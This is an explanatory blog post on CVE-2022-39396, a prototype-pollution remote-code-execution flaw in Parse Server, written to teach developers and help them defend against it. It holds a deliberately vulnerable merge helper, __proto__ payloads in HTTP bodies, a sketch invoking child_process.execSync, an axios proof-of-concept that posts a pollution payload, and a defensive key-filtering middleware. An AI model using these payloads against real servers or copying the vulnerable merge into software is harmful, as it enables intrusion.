CVE-2022-39396 - Remote Code Execution in Parse Server via Prototype Pollution Explained
Parse Server is a popular open-source backend framework that you can easily set up using Node.js. It supports a wide range of features out-of-the-box, making mobile and web app development easier. However, security issues in backend platforms can go unnoticed until they are exploited. In 2022, a critical vulnerability tracked as CVE-2022-39396 was disclosed in Parse Server that allowed attackers to execute code remotely through *prototype pollution*, impacting all 4.x versions before 4.10.18 and all 5.x versions before 5.3.1.
This post breaks the issue down into simple language, walks you through its mechanism, its exploitability, and what you can do to stay safe.
## What is Prototype Pollution?
JavaScript uses something called *prototypes*. Objects in JavaScript inherit properties and methods from their prototypes, and almost every plain object ultimately inherits from the shared `Object.prototype`. If you manage to change a prototype (for example, by setting new properties on it), every object that inherits from it, whether created before or after the change, picks up the new property.
*Prototype pollution* is when attackers manipulate the prototype of objects. This generally lets attackers influence application logic in unexpected ways, which—depending on the application—may result in information leakage, denial of service, or even arbitrary code execution.
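To make this concrete, here is an added example written for this post (it is not code from Parse Server or from the original advisory). It uses a constructed JSON body and a deliberately naive recursive merge, the kind of helper many Node.js applications use to apply a request body onto an object, and shows that after the merge an unrelated, pre-existing object "has" the attacker's property. The hardened variant copies the body into containers created with `Object.create(null)`, which have no `__proto__` accessor in their chain, so the same key becomes a harmless own property. The field names (`isAdmin`, `settings`) are illustrative assumptions.

```javascript
'use strict';

// Constructed attacker body as a raw JSON string. A JS object literal such as
// { "__proto__": {...} } would set the literal's prototype instead of creating a
// key, whereas JSON.parse, like an HTTP JSON body parser, creates an own
// "__proto__" property that a merge helper will happily walk into.
const ATTACKER_BODY = '{"name":"demo","__proto__":{"isAdmin":true}}';

const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Naive recursive merge (illustrative, vulnerable on purpose). Reading
// target["__proto__"] goes through the inherited accessor and returns
// Object.prototype, so the nested keys are written onto the shared prototype.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      naiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened copy: every container is created without a prototype, so there is
// no "__proto__" accessor to hit. The attacker's key becomes an ordinary own
// property of one object instead of a write to Object.prototype.
function copyWithoutPrototype(source) {
  const out = Object.create(null);
  for (const key of Object.keys(source)) {
    const value = source[key];
    out[key] = isPlainObject(value) ? copyWithoutPrototype(value) : value;
  }
  return out;
}

// Runs the vulnerable merge and reports what an unrelated object now sees.
function demoNaiveMerge() {
  const settings = { name: 'unset' };
  const unrelated = {}; // created before the merge and never touched
  naiveMerge(settings, JSON.parse(ATTACKER_BODY));
  const result = {
    name: settings.name,                                    // 'demo'
    settingsOwnsIsAdmin: hasOwn(settings, 'isAdmin'),       // false: it is inherited
    unrelatedIsAdmin: unrelated.isAdmin,                    // true
    freshIsAdmin: ({}).isAdmin,                             // true
    prototypePolluted: hasOwn(Object.prototype, 'isAdmin'), // true
  };
  delete Object.prototype.isAdmin; // undo the pollution for the rest of the process
  return result;
}

// Same body through the hardened path: nothing leaks to other objects.
function demoNullPrototypeCopy() {
  const settings = copyWithoutPrototype(JSON.parse(ATTACKER_BODY));
  return {
    name: settings.name,                                    // 'demo'
    settingsIsAdmin: settings.isAdmin,                      // undefined
    protoKeyIsOwnData: hasOwn(settings, '__proto__'),       // true, and harmless
    freshIsAdmin: ({}).isAdmin,                             // undefined
    prototypePolluted: hasOwn(Object.prototype, 'isAdmin'), // false
  };
}

console.log(demoNaiveMerge());
console.log(demoNullPrototypeCopy());
```

Two practical takeaways from the example: a check such as `if (user.isAdmin)` on any object in the process becomes attacker-controlled once `Object.prototype` is polluted, and the only reason the body's `__proto__` key is even visible to the merge is that it arrived through `JSON.parse`. That second point matters when writing a proof of concept, since a Node.js object literal with a `__proto__` key does not produce the same key.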
## How Does CVE-2022-39396 Work?

Affected versions:

- All 4.x versions before 4.10.18
- All 5.x branch versions before 5.3.1

Vulnerability:

A user could pollute `Object.prototype` by sending crafted keys (such as `__proto__`) in request payloads, for example in queries and object writes. The polluted property would then be picked up by internal logic, specifically the way Parse Server handles received objects and hands them to the underlying MongoDB BSON parser.

Impact:

Once the prototype is polluted, the attacker can get code executed on the server as soon as a tainted object is processed. This is a Remote Code Execution (RCE) vulnerability: an attacker could run system commands, steal sensitive data, or take over the backend completely.
## Proof-of-Concept Exploit
Polluting the Prototype:

The attacker sends a request to Parse Server whose JSON body contains a key such as `__proto__` with nested properties.

Trigger Execution:

When Parse Server processes this input, it unknowingly sets properties on the shared `Object.prototype`. Later, when the data is passed to MongoDB, those polluted properties change the behavior of the BSON parser, eventually letting the attacker run JavaScript code on the server.
Example HTTP Request

```http
POST /parse/classes/YourClass
Content-Type: application/json

{
  "__proto__": {
    "polluted": "malicious"
  }
}
```

*Here, "__proto__" is an intentional way to manipulate the root prototype. A real request to the Parse REST API also carries the X-Parse-Application-Id header; it is omitted here for brevity.*
Malicious Object Example

The attacker could go further and try to inject properties that the MongoDB BSON parser would later act on. The sketch below illustrates the intent only; it is not valid JSON, because JSON has no way to carry a function body, so a real payload cannot look exactly like this:

```js
{
  "__proto__": {
    "constructor": {
      "prototype": {
        "toString": function() {
          // Malicious code here
          require('child_process').execSync('touch /tmp/hacked');
        }
      }
    }
  }
}
```
Here is a Node.js proof-of-concept that demonstrates sending the prototype pollution payload:

```javascript
const axios = require('axios');

const parseServerUrl = 'http://localhost:1337/parse/classes/SomeClass';

// The body is a raw JSON string on purpose. In a JavaScript object literal,
// "__proto__" sets the literal's prototype instead of creating a key, so
// JSON.stringify would send an empty object. A function value such as
// `require` cannot be serialised to JSON at all, so only plain data is sent.
const body = `{
  "__proto__": {
    "constructor": {
      "prototype": {
        "env": { "PATH": "/usr/bin:..." }
      }
    }
  }
}`;

axios.post(parseServerUrl, body, {
  headers: {
    'Content-Type': 'application/json',
    // Required by the Parse REST API; replace with the target's app ID.
    'X-Parse-Application-Id': 'YOUR_APP_ID',
  },
}).then(() => {
  console.log('Exploit attempt sent!');
}).catch(error => {
  console.error(error.message);
});
```
*Note: This is for educational demonstration only.*
## Patch and Mitigation
Fixed versions:

- 4.10.18 (4.x)
- 5.3.1 (5.x)

You should upgrade immediately to these versions or later. There are no official workarounds short of upgrading.

- Parse Server Changelog—4.x
- Parse Server Changelog—5.3.1

As defense in depth, and not as a substitute for the upgrade, filter dangerous fields such as `__proto__`, `constructor` and `prototype` in HTTP proxies or at application level.
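The following is an added example of such an application-level filter, written for this post; it is not Parse Server's own fix and does not replace upgrading. It walks a parsed request body to any depth, including inside arrays (a place a shallow check would miss), and rejects the request before the body reaches the data layer. Parse Server runs on Express, so the middleware signature is Express-style; the request/response objects, sample bodies and field names are constructed for the demonstration.

```javascript
'use strict';

// Keys that can be used to reach Object.prototype through a merge or parser.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Walks a parsed JSON body and returns the path of the first forbidden key,
// or null if the body is clean. Only exact key names are flagged, so a field
// such as "my__proto__note" is allowed through.
function findForbiddenKey(value, path = '$') {
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = findForbiddenKey(value[i], `${path}[${i}]`);
      if (hit) return hit;
    }
    return null;
  }
  if (value !== null && typeof value === 'object') {
    for (const key of Object.keys(value)) {
      const here = `${path}.${key}`;
      if (FORBIDDEN_KEYS.has(key)) return here; // stop before reading value[key]
      const hit = findForbiddenKey(value[key], here);
      if (hit) return hit;
    }
  }
  return null;
}

// Express-style middleware: rejects with 400 instead of forwarding the request.
function rejectForbiddenKeys(req, res, next) {
  const hit = findForbiddenKey(req.body);
  if (hit) {
    return res.status(400).json({ error: `forbidden key at ${hit}` });
  }
  return next();
}

// Constructed sample bodies, built with JSON.parse as a body parser would, so
// "__proto__" is an own key rather than a prototype assignment.
const SAMPLE_BODIES = {
  clean: JSON.parse('{"objectId":"abc123","score":10,"tags":["a","b"],"meta":{"my__proto__note":"ok"}}'),
  topLevel: JSON.parse('{"__proto__":{"polluted":"malicious"}}'),
  buried: JSON.parse('{"items":[{"ok":1},{"nested":{"constructor":{"prototype":{"x":1}}}}]}'),
};

// Drives the middleware with a fake req/res pair and reports the outcome.
function runFilter(body) {
  let status = null;
  let error = null;
  let forwarded = false;
  const res = {
    status(code) { status = code; return this; },
    json(payload) { error = payload.error; return this; },
  };
  rejectForbiddenKeys({ body }, res, () => { forwarded = true; });
  return { status, error, forwarded };
}

for (const [name, body] of Object.entries(SAMPLE_BODIES)) {
  console.log(name, runFilter(body));
}
```

Because the match is on exact key names, a schema that legitimately uses a field called `constructor` would be blocked; adjust the set to your data model rather than weakening it to a substring check. The filter also has to run on the already-parsed body, since a regex over the raw text is easy to evade with JSON escapes such as `\u005f\u005fproto__`.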
## References & Further Reading
- GitHub Security Advisory CVE-2022-39396
- NVD CVE-2022-39396 Details
- Parse Server Release Notes
## Conclusion
CVE-2022-39396 is a critical vulnerability in Parse Server that can let remote attackers execute arbitrary code through prototype pollution, without needing an account. The only real fix is to upgrade to a patched version (4.10.18 or later on 4.x, 5.3.1 or later on 5.x). If you use Parse Server in production, patch immediately.
Security flaws like these are harsh reminders: never trust user input, and always keep dependencies up to date.
Stay safe, and keep your backends secure!
*This guide is written in plain language for developers trying to understand and mitigate CVE-2022-39396. Share it with your peers if you know anyone running vulnerable Parse Server versions!*
Timeline
Published on: 11/10/2022 01:15:00 UTC
Last modified on: 11/11/2022 02:01:00 UTC